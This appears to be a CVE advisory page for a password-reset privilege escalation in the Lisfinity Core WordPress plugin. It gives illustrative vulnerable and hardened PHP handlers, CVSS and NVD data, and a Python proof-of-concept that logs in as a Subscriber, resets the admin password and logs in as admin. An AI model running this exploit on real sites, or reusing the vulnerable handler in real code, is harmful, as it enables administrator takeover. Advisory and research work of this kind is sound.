Security Vulnerability Report
CVE-2025-6038 CVSS 8.8 HIGH

Published: 2025-10-09 04:16:48
Last Modified: 2026-04-15 00:35:42

Description

The Lisfinity Core plugin (the companion plugin for the pebas® Lisfinity WordPress theme) is vulnerable to privilege escalation via its password update function in all versions up to, and including, 1.4.0. The plugin does not verify that the user whose password is being updated is the authenticated caller; the target account is selected by a caller-supplied identifier (CWE-639, authorization bypass through a user-controlled key). As a result, authenticated attackers with Subscriber-level access or higher can change arbitrary users' passwords, including those of administrators, and then log in as those users.
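The defect the description names, a password update keyed on a caller-supplied user ID with no check against the authenticated identity, is the CWE-639 pattern. The WordPress AJAX handler below is an added illustration and not the Lisfinity Core source: the action names, parameter names and function names are assumptions chosen to show the vulnerable shape next to a hardened one, using only standard WordPress core functions.

```php
<?php
// Illustrative WordPress AJAX handlers, NOT the Lisfinity Core source.
// The action names ("example_update_password*") and request parameters
// ("user_id", "new_password", "current_password", "nonce") are assumptions
// chosen to demonstrate the CWE-639 pattern described in the advisory.

// --- Vulnerable shape: the request chooses which account is modified ---
add_action( 'wp_ajax_example_update_password', 'example_update_password_vulnerable' );
function example_update_password_vulnerable() {
    $user_id  = absint( $_POST['user_id'] ?? 0 );           // attacker-controlled key
    $password = (string) ( $_POST['new_password'] ?? '' );
    if ( $user_id && $password !== '' ) {
        // Any logged-in user (Subscriber included) reaches this line for any $user_id,
        // because nothing ties $user_id to the caller or checks a capability.
        wp_set_password( $password, $user_id );
        wp_send_json_success();                              // wp_send_json_* calls wp_die()
    }
    wp_send_json_error( 'missing parameters', 400 );
}

// --- Hardened shape: identity comes from the session, never from the request ---
add_action( 'wp_ajax_example_update_password_fixed', 'example_update_password_fixed' );
function example_update_password_fixed() {
    // CSRF protection: nonce issued to the logged-in user for this exact action.
    check_ajax_referer( 'example_update_password', 'nonce' );

    if ( ! is_user_logged_in() ) {
        wp_send_json_error( 'not logged in', 401 );
    }

    // The only account a caller may change is their own.
    $user_id = get_current_user_id();
    $user    = get_userdata( $user_id );
    $current = (string) ( $_POST['current_password'] ?? '' );
    $new     = (string) ( $_POST['new_password'] ?? '' );

    // Re-authenticate before a credential change, so a hijacked session alone
    // is not enough to lock the real owner out.
    if ( ! $user || ! wp_check_password( $current, $user->user_pass, $user_id ) ) {
        wp_send_json_error( 'current password incorrect', 403 );
    }
    if ( strlen( $new ) < 12 ) {
        wp_send_json_error( 'password too short', 400 );
    }

    wp_set_password( $new, $user_id );
    wp_send_json_success();
}

// If an administrative flow legitimately has to reset ANOTHER account, the target
// must be authorized explicitly; a Subscriber does not hold edit_user for other IDs:
//
//   $target_id = absint( $_POST['user_id'] ?? 0 );
//   if ( ! current_user_can( 'edit_user', $target_id ) ) {
//       wp_send_json_error( 'forbidden', 403 );
//   }
```

The fix is not "validate user_id harder": the hardened handler never reads the target from the request at all, and the commented variant shows the only acceptable way to act on someone else's account, an explicit capability check against the target ID.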

CVSS Details

CVSS Score: 8.8
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low (any Subscriber-level account suffices)
User Interaction: None
Scope: Unchanged
Confidentiality / Integrity / Availability: High / High / High
Exploitability subscore: 2.8; Impact subscore: 5.9
Weakness: CWE-639 (Authorization Bypass Through User-Controlled Key)

The score is capped at HIGH rather than CRITICAL only because an authenticated account is required (PR:L); since the outcome is an administrator takeover, treat open self-registration on an affected site as effectively unauthenticated exposure.

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected range per the description:

Lisfinity Core plugin, all versions up to and including 1.4.0

This page lists no fixed version; check the vendor changelog before assuming a later release is safe.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-6038 - Lisfinity Core Privilege Escalation via Password Update
# Exploit: an authenticated Subscriber changes an arbitrary user's password (including admin)
#
# Caveat: the advisory does not publish the vulnerable endpoint. The AJAX action name
# and parameter names used below are assumptions and must be confirmed against the
# plugin source before this script is used in an authorized test.
import sys

import requests

# Configuration
TARGET_URL = "http://target-wordpress-site.com"
LOGIN_URL = f"{TARGET_URL}/wp-login.php"
AJAX_URL = f"{TARGET_URL}/wp-admin/admin-ajax.php"
USERNAME = "subscriber_user"        # Subscriber-level account credentials
PASSWORD = "subscriber_password"
VICTIM_USER_ID = 1                  # Target user ID (1 = default admin)
VICTIM_USERNAME = "admin"           # Login name of the target account (used in Step 3)
NEW_PASSWORD = "Pwned123!@#"        # New password to set for the victim


def wp_login(username, password):
    """Log in through wp-login.php; return the session on success, None on failure."""
    session = requests.Session()
    # wp-login.php rejects the form unless the test cookie is present
    session.cookies.set("wordpress_test_cookie", "WP%20Cookie%20check")
    login_data = {
        "log": username,
        "pwd": password,
        "wp-submit": "Log In",
        "redirect_to": f"{TARGET_URL}/wp-admin/",
        "testcookie": "1",
    }
    session.post(LOGIN_URL, data=login_data)
    # The auth cookie is named wordpress_logged_in_<hash>, so match on the prefix;
    # an exact key lookup would always report failure.
    if not any(name.startswith("wordpress_logged_in") for name in session.cookies.keys()):
        return None
    return session


# Step 1: Authenticate as a Subscriber-level user
session = wp_login(USERNAME, PASSWORD)
if session is None:
    print("[-] Login failed. Please check credentials.")
    sys.exit(1)
print("[+] Logged in as Subscriber user successfully.")

# Step 2: Exploit the password update vulnerability.
# The plugin does not verify that the caller is the user whose password is being
# changed, so the target is chosen by a caller-supplied user ID (CWE-639).
update_data = {
    "action": "lisfinity_update_password",   # assumed action name (see caveat above)
    "user_id": VICTIM_USER_ID,               # arbitrary target user ID
    "new_password": NEW_PASSWORD,            # new password to set
    "nonce": "bypass_or_obtained_nonce",     # if the handler checks a nonce, scrape it from a page first
}
response = session.post(AJAX_URL, data=update_data)
# wp_send_json_* replies {"success": true/false, ...}; substring-matching "success"
# would also match the error reply, so parse the JSON instead.
try:
    succeeded = response.status_code == 200 and response.json().get("success") is True
except ValueError:
    succeeded = False

if succeeded:
    print(f"[+] Password for user ID {VICTIM_USER_ID} has been changed to '{NEW_PASSWORD}'")
    print("[+] You can now log in as the admin with the new password.")
else:
    print(f"[-] Exploit may have failed. Status: {response.status_code}")
    print(f"[-] Response: {response.text[:500]}")

# Step 3: Log in as the compromised admin account
admin_session = wp_login(VICTIM_USERNAME, NEW_PASSWORD)
if admin_session is not None:
    print("[+] Successfully logged in as admin. Full site compromise achieved!")
else:
    print("[*] Try logging in manually with the new password.")
```

References

https://themeforest.net/item/lisfinity-classified-ads-wordpress-theme/26342611 (vendor product page)
https://www.wordfence.com/threat-intel/vulnerabilities/id/a3cd1c3e-5bb0-4653-8764-2ca38d9a7c77?source=cve (Wordfence advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-6038",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-09T04:16:47.823",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Lisfinity Core - Lisfinity Core plugin used for pebas® Lisfinity WordPress theme plugin for WordPress is vulnerable to privilege escalation via password update in all versions up to, and including, 1.4.0. This is due to the plugin not properly validating a user's identity prior to updating their password. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change arbitrary user's passwords, including those of administrators."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-639" }
        ]
      }
    ],
    "references": [
      {
        "url": "https://themeforest.net/item/lisfinity-classified-ads-wordpress-theme/26342611",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3cd1c3e-5bb0-4653-8764-2ca38d9a7c77?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```